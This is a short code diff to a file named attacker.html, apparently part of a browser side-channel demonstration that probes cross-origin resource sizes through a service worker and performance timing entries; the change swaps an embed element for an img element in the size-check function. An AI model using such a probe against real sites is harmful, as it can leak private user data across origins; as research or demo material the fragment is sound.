--- a/src/range-serviceworker/attacker.html
+++ b/src/range-serviceworker/attacker.html
@@ -14,8 +14,7 @@
 
       function singleSizeCheck(url, size) {
         let start = performance.getEntries().length;
-        let element = document.createElement("embed");
-        element.type = 'html/text';
+        let element = document.createElement("img");
         element.src = `${url}?size=1`;
         return new Promise((resolve) => {
           element.onload = () => {
